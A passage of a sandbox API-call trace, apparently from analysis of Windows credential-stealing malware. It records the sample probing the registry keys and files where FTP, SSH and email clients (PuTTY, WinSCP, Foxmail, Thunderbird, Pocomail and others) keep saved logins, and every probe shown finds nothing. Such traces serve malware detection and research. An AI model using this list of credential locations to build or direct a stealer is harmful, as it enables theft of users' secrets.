lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.410] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0064.410] GetProcessHeap () returned 0x620000 [0064.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637ca0 | out: hHeap=0x620000) returned 1 [0064.411] GetProcessHeap () returned 0x620000 [0064.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63b6b0 [0064.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.412] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba8*=0x104) returned 0x2 [0064.412] GetProcessHeap () returned 0x620000 [0064.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.412] GetProcessHeap () returned 0x620000 [0064.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.413] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.413] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0064.413] GetProcessHeap () returned 0x620000 [0064.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b6b0 [0064.414] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.414] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0064.414] GetProcessHeap () returned 0x620000 [0064.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63a6e0 [0064.415] GetProcessHeap () returned 0x620000 [0064.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.416] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0064.416] GetProcessHeap () returned 0x620000 [0064.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.416] GetProcessHeap () returned 0x620000 [0064.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.417] GetProcessHeap () returned 0x620000 [0064.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.417] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.418] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0064.418] GetProcessHeap () returned 0x620000 [0064.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8c) returned 0x63b6b0 [0064.425] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.426] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0064.426] GetProcessHeap () returned 0x620000 [0064.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x637b20 [0064.426] GetProcessHeap () returned 0x620000 [0064.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.427] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0064.428] GetProcessHeap () returned 0x620000 [0064.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637b20 | out: hHeap=0x620000) returned 1 [0064.428] GetProcessHeap () returned 0x620000 [0064.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.428] GetProcessHeap () returned 0x620000 [0064.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.428] GetProcessHeap () returned 0x620000 [0064.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b4a0 [0064.428] GetProcessHeap () returned 0x620000 [0064.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b500 [0064.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.430] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x63b500 | out: phkResult=0x63b500*=0x0) returned 0x2 [0064.430] GetProcessHeap () returned 0x620000 [0064.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0064.430] GetProcessHeap () returned 0x620000 [0064.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0064.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.431] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x63b660 | out: phkResult=0x63b660*=0x0) returned 0x2 [0064.431] GetProcessHeap () returned 0x620000 [0064.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0064.431] GetProcessHeap () returned 0x620000 [0064.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.431] GetProcessHeap () returned 0x620000 [0064.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b4a0 | out: hHeap=0x620000) returned 1 [0064.431] GetProcessHeap () returned 0x620000 [0064.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.432] GetProcessHeap () returned 0x620000 [0064.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b6c8 [0064.432] GetProcessHeap () returned 0x620000 [0064.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0064.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.433] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x63b540 | out: phkResult=0x63b540*=0x0) returned 0x2 [0064.433] GetProcessHeap () returned 0x620000 [0064.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0064.433] GetProcessHeap () returned 0x620000 [0064.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5e0 [0064.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.435] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x63b5e0 | out: phkResult=0x63b5e0*=0x0) returned 0x2 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5e0 | out: hHeap=0x620000) returned 1 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b6c8 | out: hHeap=0x620000) returned 1 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b6c8 [0064.435] GetProcessHeap () returned 0x620000 [0064.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0064.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.436] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x63b660 | out: phkResult=0x63b660*=0x0) returned 0x2 [0064.437] GetProcessHeap () returned 0x620000 [0064.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0064.437] GetProcessHeap () returned 0x620000 [0064.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5b0 [0064.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.438] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x63b5b0 | out: phkResult=0x63b5b0*=0x0) returned 0x2 [0064.438] GetProcessHeap () returned 0x620000 [0064.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5b0 | out: hHeap=0x620000) returned 1 [0064.438] GetProcessHeap () returned 0x620000 [0064.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5f0 [0064.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.439] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x63b5f0 | out: phkResult=0x63b5f0*=0x0) returned 0x2 [0064.439] GetProcessHeap () returned 0x620000 [0064.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5f0 | out: hHeap=0x620000) returned 1 [0064.439] GetProcessHeap () returned 0x620000 [0064.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0064.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.441] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x63b670 | out: phkResult=0x63b670*=0x0) returned 0x2 [0064.441] GetProcessHeap () returned 0x620000 [0064.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0064.441] GetProcessHeap () returned 0x620000 [0064.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.441] GetProcessHeap () returned 0x620000 [0064.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b6c8 | out: hHeap=0x620000) returned 1 [0064.441] GetProcessHeap () returned 0x620000 [0064.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63b6b0 [0064.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.442] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104) returned 0x2 [0064.442] GetProcessHeap () returned 0x620000 [0064.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.442] GetProcessHeap () returned 0x620000 [0064.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b6b0 [0064.443] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.444] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Foxmail\\mail", arglist=0x19fbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0064.444] GetProcessHeap () returned 0x620000 [0064.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x63a478 [0064.444] GetProcessHeap () returned 0x620000 [0064.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.445] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0064.445] GetProcessHeap () returned 0x620000 [0064.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.445] GetProcessHeap () returned 0x620000 [0064.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.446] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x63a478, nSize=0x104 | out: lpDst="C:") returned 0x3 [0064.447] Sleep (dwMilliseconds=0xa) [0064.468] GetProcessHeap () returned 0x620000 [0064.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.469] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.470] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f938 | out: param_1="C:\\Foxmail*") returned 11 [0064.470] GetProcessHeap () returned 0x620000 [0064.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x6331d8 [0064.470] GetProcessHeap () returned 0x620000 [0064.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.471] FindFirstFileW (in: lpFileName="C:\\Foxmail*" (normalized: "c:\\foxmail*"), lpFindFileData=0x19f94c | out: lpFindFileData=0x19f94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="ꑸcĄ")) returned 0xffffffff [0064.471] GetProcessHeap () returned 0x620000 [0064.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6331d8 | out: hHeap=0x620000) returned 1 [0064.471] GetProcessHeap () returned 0x620000 [0064.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.471] GetProcessHeap () returned 0x620000 [0064.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x63b6b0 [0064.472] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.473] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0064.473] GetProcessHeap () returned 0x620000 [0064.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63a478 [0064.473] GetProcessHeap () returned 0x620000 [0064.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.474] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0064.475] GetProcessHeap () returned 0x620000 [0064.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.476] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.476] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x63b6b0 [0064.477] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.478] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0064.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x63a6e0 [0064.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.480] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0064.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b6c8 [0064.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0064.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.482] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x63b4d0 | out: phkResult=0x63b4d0*=0x0) returned 0x2 [0064.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0064.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5e0 [0064.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.484] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x63b5e0 | out: phkResult=0x63b5e0*=0x0) returned 0x2 [0064.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5e0 | out: hHeap=0x620000) returned 1 [0064.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b6c8 | out: hHeap=0x620000) returned 1 [0064.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x63b6b0 [0064.485] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.486] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0064.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x63a478 [0064.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.487] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0064.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.488] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.489] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0064.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6a) returned 0x63b6b0 [0064.489] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.490] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0064.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x74) returned 0x6377a0 [0064.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.491] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0064.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6377a0 | out: hHeap=0x620000) returned 1 [0064.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.493] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.493] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0064.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f7c) returned 0x63b6b0 [0064.494] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.495] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0064.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x68) returned 0x63a6e0 [0064.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.496] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0064.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b758 [0064.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0064.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.499] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x63b4f0 | out: phkResult=0x63b4f0*=0x0) returned 0x2 [0064.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0064.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0064.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.500] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x63b510 | out: phkResult=0x63b510*=0x0) returned 0x2 [0064.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0064.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b758 | out: hHeap=0x620000) returned 1 [0064.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.502] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.502] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Windows") returned 0x0 [0064.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b6b0 [0064.503] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.504] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\32BitFtp.TMP", arglist=0x19fba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0064.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x62d510 [0064.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.505] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0064.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d510 | out: hHeap=0x620000) returned 1 [0064.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.507] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.507] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Windows") returned 0x0 [0064.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b6b0 [0064.508] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.509] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\32BitFtp.ini", arglist=0x19fb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0064.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x62d790 [0064.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.510] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0064.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d790 | out: hHeap=0x620000) returned 1 [0064.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.511] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x63a478, nSize=0x104 | out: lpDst="C:") returned 0x3 [0064.511] GetProcessHeap () returned 0x620000 [0064.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f78) returned 0x63b6b0 [0064.531] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.532] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19fba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0064.532] GetProcessHeap () returned 0x620000 [0064.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3c) returned 0x6345d0 [0064.532] GetProcessHeap () returned 0x620000 [0064.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.534] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0064.534] GetProcessHeap () returned 0x620000 [0064.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6345d0 | out: hHeap=0x620000) returned 1 [0064.535] GetProcessHeap () returned 0x620000 [0064.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.535] GetProcessHeap () returned 0x620000 [0064.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.536] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x63a478, nSize=0x104 | out: lpDst="C:") returned 0x3 [0064.536] GetProcessHeap () returned 0x620000 [0064.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f92) returned 0x63b6b0 [0064.536] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.537] 